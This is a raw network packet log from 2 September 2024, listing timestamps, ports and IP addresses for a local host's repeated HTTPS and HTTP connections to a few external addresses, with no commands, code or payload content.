Sep 2, 2024 16:50:31.489396095 CEST	80	56191	208.95.112.1	192.168.2.5
Sep 2, 2024 16:50:31.942344904 CEST	80	56191	208.95.112.1	192.168.2.5
Sep 2, 2024 16:50:32.119605064 CEST	56191	80	192.168.2.5	208.95.112.1
Sep 2, 2024 16:50:32.746146917 CEST	56192	443	192.168.2.5	185.199.108.133
Sep 2, 2024 16:50:32.746222019 CEST	443	56192	185.199.108.133	192.168.2.5
Sep 2, 2024 16:50:32.746279955 CEST	56192	443	192.168.2.5	185.199.108.133
Sep 2, 2024 16:50:32.750674963 CEST	56192	443	192.168.2.5	185.199.108.133
Sep 2, 2024 16:50:32.750694990 CEST	443	56192	185.199.108.133	192.168.2.5
Sep 2, 2024 16:50:33.184396982 CEST	443	56192	185.199.108.133	192.168.2.5
Sep 2, 2024 16:50:33.184488058 CEST	56192	443	192.168.2.5	185.199.108.133
Sep 2, 2024 16:50:33.220722914 CEST	56192	443	192.168.2.5	185.199.108.133
Sep 2, 2024 16:50:33.220760107 CEST	443	56192	185.199.108.133	192.168.2.5
Sep 2, 2024 16:50:33.221157074 CEST	443	56192	185.199.108.133	192.168.2.5
Sep 2, 2024 16:50:33.356093884 CEST	56192	443	192.168.2.5	185.199.108.133
Sep 2, 2024 16:50:33.396518946 CEST	443	56192	185.199.108.133	192.168.2.5
Sep 2, 2024 16:50:33.446932077 CEST	443	56192	185.199.108.133	192.168.2.5
Sep 2, 2024 16:50:33.447052956 CEST	443	56192	185.199.108.133	192.168.2.5
Sep 2, 2024 16:50:33.447129965 CEST	56192	443	192.168.2.5	185.199.108.133
Sep 2, 2024 16:50:33.468466043 CEST	56192	443	192.168.2.5	185.199.108.133
Sep 2, 2024 16:50:39.591012001 CEST	56193	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:39.591058016 CEST	443	56193	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:39.591116905 CEST	56193	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:39.592463017 CEST	56193	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:39.592477083 CEST	443	56193	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:40.200716972 CEST	443	56193	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:40.200793028 CEST	56193	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:40.203185081 CEST	56193	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:40.203195095 CEST	443	56193	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:40.203439951 CEST	443	56193	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:40.204401970 CEST	56193	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:40.244502068 CEST	443	56193	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:40.485169888 CEST	443	56193	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:40.487811089 CEST	56193	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:40.487842083 CEST	443	56193	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:40.488631010 CEST	56193	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:40.488641024 CEST	443	56193	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:40.488899946 CEST	56193	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:40.488907099 CEST	443	56193	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:40.489015102 CEST	56193	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:40.489018917 CEST	443	56193	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:40.828253984 CEST	443	56193	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:40.828346014 CEST	443	56193	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:40.828404903 CEST	56193	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:40.832789898 CEST	56193	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:40.844706059 CEST	56194	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:40.844738007 CEST	443	56194	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:40.844814062 CEST	56194	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:40.845129013 CEST	56194	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:40.845143080 CEST	443	56194	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:41.450608015 CEST	443	56194	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:41.465205908 CEST	56194	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:41.465234995 CEST	443	56194	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:41.747495890 CEST	443	56194	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:41.747576952 CEST	443	56194	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:41.747642040 CEST	56194	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:41.754688025 CEST	56194	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:42.289825916 CEST	56195	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:42.289897919 CEST	443	56195	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:42.289971113 CEST	56195	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:42.290966034 CEST	56195	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:42.290980101 CEST	443	56195	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:42.897003889 CEST	443	56195	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:42.899967909 CEST	56195	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:42.900007010 CEST	443	56195	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:43.205077887 CEST	443	56195	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:43.205162048 CEST	443	56195	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:43.205507994 CEST	56195	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:43.205857038 CEST	56195	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:43.268873930 CEST	56196	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:43.268932104 CEST	443	56196	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:43.269139051 CEST	56196	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:43.269433022 CEST	56196	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:43.269448042 CEST	443	56196	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:43.887756109 CEST	443	56196	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:43.895934105 CEST	56196	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:43.895956993 CEST	443	56196	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:44.204248905 CEST	443	56196	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:44.412507057 CEST	443	56196	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:44.412760973 CEST	56196	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:44.521163940 CEST	56196	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:44.521200895 CEST	443	56196	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:44.521346092 CEST	56196	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:44.521352053 CEST	443	56196	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:44.521503925 CEST	56196	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:44.521522045 CEST	443	56196	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:44.521635056 CEST	56196	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:44.521653891 CEST	443	56196	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:44.521768093 CEST	56196	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:44.521794081 CEST	443	56196	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:44.521850109 CEST	56196	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:44.521862984 CEST	443	56196	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:44.653458118 CEST	56196	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:44.653556108 CEST	443	56196	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:44.998204947 CEST	443	56196	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:44.998296976 CEST	443	56196	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:44.998343945 CEST	56196	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:44.998775959 CEST	56196	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:45.044817924 CEST	56197	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:45.044862986 CEST	443	56197	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:45.045094967 CEST	56197	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:45.045717955 CEST	56197	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:45.045736074 CEST	443	56197	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:45.657615900 CEST	443	56197	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:45.659424067 CEST	56197	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:45.659450054 CEST	443	56197	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:45.948117018 CEST	443	56197	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:45.948682070 CEST	443	56197	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:45.948759079 CEST	56197	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:45.949063063 CEST	56197	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:45.955024958 CEST	56198	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:45.955060005 CEST	443	56198	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:45.955117941 CEST	56198	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:45.955341101 CEST	56198	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:45.955353975 CEST	443	56198	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:46.552640915 CEST	443	56198	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:46.553639889 CEST	56198	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:46.553663015 CEST	443	56198	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:46.810767889 CEST	443	56198	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:46.810836077 CEST	443	56198	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:46.810947895 CEST	56198	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:46.811922073 CEST	56198	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:47.824429989 CEST	56200	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:47.824492931 CEST	443	56200	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:47.824549913 CEST	56200	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:47.824783087 CEST	56200	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:47.824796915 CEST	443	56200	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:48.439373016 CEST	443	56200	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:48.443960905 CEST	56200	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:48.443989038 CEST	443	56200	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:48.689800024 CEST	443	56200	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:48.689882040 CEST	443	56200	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:48.689924955 CEST	56200	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:48.690370083 CEST	56200	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:49.702555895 CEST	56202	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:49.702617884 CEST	443	56202	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:49.702871084 CEST	56202	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:49.703977108 CEST	56202	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:49.703990936 CEST	443	56202	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:50.324704885 CEST	443	56202	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:50.327931881 CEST	56202	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:50.327955008 CEST	443	56202	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:50.764964104 CEST	443	56202	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:50.765034914 CEST	443	56202	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:50.765093088 CEST	56202	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:50.765445948 CEST	56202	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:51.776916027 CEST	56203	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:51.776971102 CEST	443	56203	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:51.777030945 CEST	56203	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:51.777419090 CEST	56203	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:51.777432919 CEST	443	56203	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:52.365796089 CEST	443	56203	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:52.367129087 CEST	56203	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:52.367151976 CEST	443	56203	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:52.541203022 CEST	443	56203	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:52.541279078 CEST	443	56203	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:52.541328907 CEST	56203	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:52.554932117 CEST	56203	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:53.557670116 CEST	56204	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:53.557719946 CEST	443	56204	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:53.557838917 CEST	56204	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:53.558163881 CEST	56204	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:53.558176994 CEST	443	56204	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:54.161864996 CEST	443	56204	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:54.162991047 CEST	56204	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:54.163022995 CEST	443	56204	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:54.409287930 CEST	443	56204	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:54.409373045 CEST	443	56204	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:54.409424067 CEST	56204	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:54.409817934 CEST	56204	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:55.422089100 CEST	56206	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:55.422142982 CEST	443	56206	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:55.422207117 CEST	56206	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:55.422477007 CEST	56206	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:55.422487974 CEST	443	56206	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:56.007322073 CEST	443	56206	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:56.009365082 CEST	56206	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:56.009398937 CEST	443	56206	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:56.250821114 CEST	443	56206	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:56.250914097 CEST	443	56206	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:56.250963926 CEST	56206	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:56.251341105 CEST	56206	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:57.260582924 CEST	56207	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:57.260654926 CEST	443	56207	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:57.260709047 CEST	56207	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:57.260988951 CEST	56207	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:57.261002064 CEST	443	56207	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:57.869544983 CEST	443	56207	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:57.883115053 CEST	56207	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:57.883148909 CEST	443	56207	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:58.121726036 CEST	443	56207	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:58.121808052 CEST	443	56207	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:58.121872902 CEST	56207	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:58.122899055 CEST	56207	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:59.135627031 CEST	56208	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:59.135683060 CEST	443	56208	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:59.135761023 CEST	56208	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:59.136045933 CEST	56208	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:59.136059046 CEST	443	56208	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:59.735980988 CEST	443	56208	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:59.737365961 CEST	56208	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:59.737396002 CEST	443	56208	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:59.980998993 CEST	443	56208	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:59.981060028 CEST	443	56208	149.154.167.220	192.168.2.5
Sep 2, 2024 16:50:59.981126070 CEST	56208	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:50:59.981549025 CEST	56208	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:00.995109081 CEST	56209	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:00.995173931 CEST	443	56209	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:00.995237112 CEST	56209	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:00.995642900 CEST	56209	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:00.995656013 CEST	443	56209	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:01.619524956 CEST	443	56209	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:01.624488115 CEST	56209	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:01.624505043 CEST	443	56209	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:01.876197100 CEST	443	56209	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:01.876275063 CEST	443	56209	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:01.876328945 CEST	56209	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:01.876694918 CEST	56209	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:02.735414982 CEST	80	56191	208.95.112.1	192.168.2.5
Sep 2, 2024 16:51:02.735712051 CEST	56191	80	192.168.2.5	208.95.112.1
Sep 2, 2024 16:51:02.888530970 CEST	56210	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:02.888585091 CEST	443	56210	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:02.888642073 CEST	56210	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:02.888957024 CEST	56210	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:02.888967037 CEST	443	56210	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:03.481950998 CEST	443	56210	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:03.482939005 CEST	56210	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:03.482965946 CEST	443	56210	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:03.729604006 CEST	443	56210	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:03.729681015 CEST	443	56210	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:03.729727030 CEST	56210	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:03.730202913 CEST	56210	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:04.747487068 CEST	56211	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:04.747549057 CEST	443	56211	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:04.747648954 CEST	56211	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:04.747898102 CEST	56211	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:04.747909069 CEST	443	56211	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:05.332748890 CEST	443	56211	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:05.333947897 CEST	56211	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:05.333973885 CEST	443	56211	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:05.620743990 CEST	443	56211	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:05.620819092 CEST	443	56211	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:05.620870113 CEST	56211	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:05.621246099 CEST	56211	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:06.645250082 CEST	56212	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:06.645318031 CEST	443	56212	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:06.645382881 CEST	56212	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:06.645653009 CEST	56212	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:06.645665884 CEST	443	56212	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:07.268091917 CEST	443	56212	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:07.269171953 CEST	56212	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:07.269197941 CEST	443	56212	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:07.513650894 CEST	443	56212	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:07.513740063 CEST	443	56212	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:07.513798952 CEST	56212	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:07.514065027 CEST	56212	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:08.540112972 CEST	56213	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:08.540174007 CEST	443	56213	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:08.540251970 CEST	56213	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:08.540508986 CEST	56213	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:08.540520906 CEST	443	56213	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:08.801908970 CEST	56214	80	192.168.2.5	208.95.112.1
Sep 2, 2024 16:51:08.806922913 CEST	80	56214	208.95.112.1	192.168.2.5
Sep 2, 2024 16:51:08.807020903 CEST	56214	80	192.168.2.5	208.95.112.1
Sep 2, 2024 16:51:08.808245897 CEST	56214	80	192.168.2.5	208.95.112.1
Sep 2, 2024 16:51:08.813059092 CEST	80	56214	208.95.112.1	192.168.2.5
Sep 2, 2024 16:51:09.246536016 CEST	443	56213	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:09.248496056 CEST	56213	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:09.248518944 CEST	443	56213	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:09.263350964 CEST	80	56214	208.95.112.1	192.168.2.5
Sep 2, 2024 16:51:09.306947947 CEST	56214	80	192.168.2.5	208.95.112.1
Sep 2, 2024 16:51:09.309994936 CEST	56215	80	192.168.2.5	208.95.112.1
Sep 2, 2024 16:51:09.314893007 CEST	80	56215	208.95.112.1	192.168.2.5
Sep 2, 2024 16:51:09.315438032 CEST	56215	80	192.168.2.5	208.95.112.1
Sep 2, 2024 16:51:09.315489054 CEST	56215	80	192.168.2.5	208.95.112.1
Sep 2, 2024 16:51:09.320324898 CEST	80	56215	208.95.112.1	192.168.2.5
Sep 2, 2024 16:51:09.495651960 CEST	443	56213	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:09.495735884 CEST	443	56213	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:09.499475956 CEST	56213	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:09.522085905 CEST	56213	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:09.899324894 CEST	80	56215	208.95.112.1	192.168.2.5
Sep 2, 2024 16:51:10.025676012 CEST	56215	80	192.168.2.5	208.95.112.1
Sep 2, 2024 16:51:10.223300934 CEST	56216	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:10.223371983 CEST	443	56216	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:10.223431110 CEST	56216	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:10.281025887 CEST	56216	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:10.281048059 CEST	443	56216	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:10.465409040 CEST	56217	443	192.168.2.5	185.199.108.133
Sep 2, 2024 16:51:10.465473890 CEST	443	56217	185.199.108.133	192.168.2.5
Sep 2, 2024 16:51:10.465545893 CEST	56217	443	192.168.2.5	185.199.108.133
Sep 2, 2024 16:51:10.468307018 CEST	56217	443	192.168.2.5	185.199.108.133
Sep 2, 2024 16:51:10.468321085 CEST	443	56217	185.199.108.133	192.168.2.5
Sep 2, 2024 16:51:10.526019096 CEST	56218	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:10.526045084 CEST	443	56218	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:10.526104927 CEST	56218	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:10.526350021 CEST	56218	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:10.526360989 CEST	443	56218	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:10.876388073 CEST	443	56216	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:10.876787901 CEST	56216	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:10.876811028 CEST	443	56216	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:10.877728939 CEST	443	56216	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:10.877785921 CEST	56216	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:10.878998995 CEST	56216	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:10.879065990 CEST	443	56216	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:10.879277945 CEST	56216	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:10.879285097 CEST	443	56216	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:10.879350901 CEST	56216	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:10.879381895 CEST	443	56216	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:10.879467964 CEST	56216	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:10.879499912 CEST	443	56216	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:10.879604101 CEST	56216	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:10.879632950 CEST	443	56216	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:10.879718065 CEST	56216	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:10.879735947 CEST	443	56216	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:10.879755974 CEST	56216	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:10.879766941 CEST	443	56216	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:10.879834890 CEST	56216	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:10.879842043 CEST	443	56216	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:10.879853964 CEST	56216	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:10.879861116 CEST	443	56216	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:10.879877090 CEST	56216	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:10.879893064 CEST	56216	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:10.879893064 CEST	443	56216	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:10.879901886 CEST	443	56216	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:10.879921913 CEST	56216	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:10.879933119 CEST	443	56216	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:10.879935026 CEST	56216	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:10.879941940 CEST	443	56216	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:10.879945993 CEST	56216	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:10.879952908 CEST	443	56216	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:10.879976988 CEST	56216	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:10.879988909 CEST	443	56216	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:10.879995108 CEST	56216	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:10.880011082 CEST	443	56216	149.154.167.220	192.168.2.5
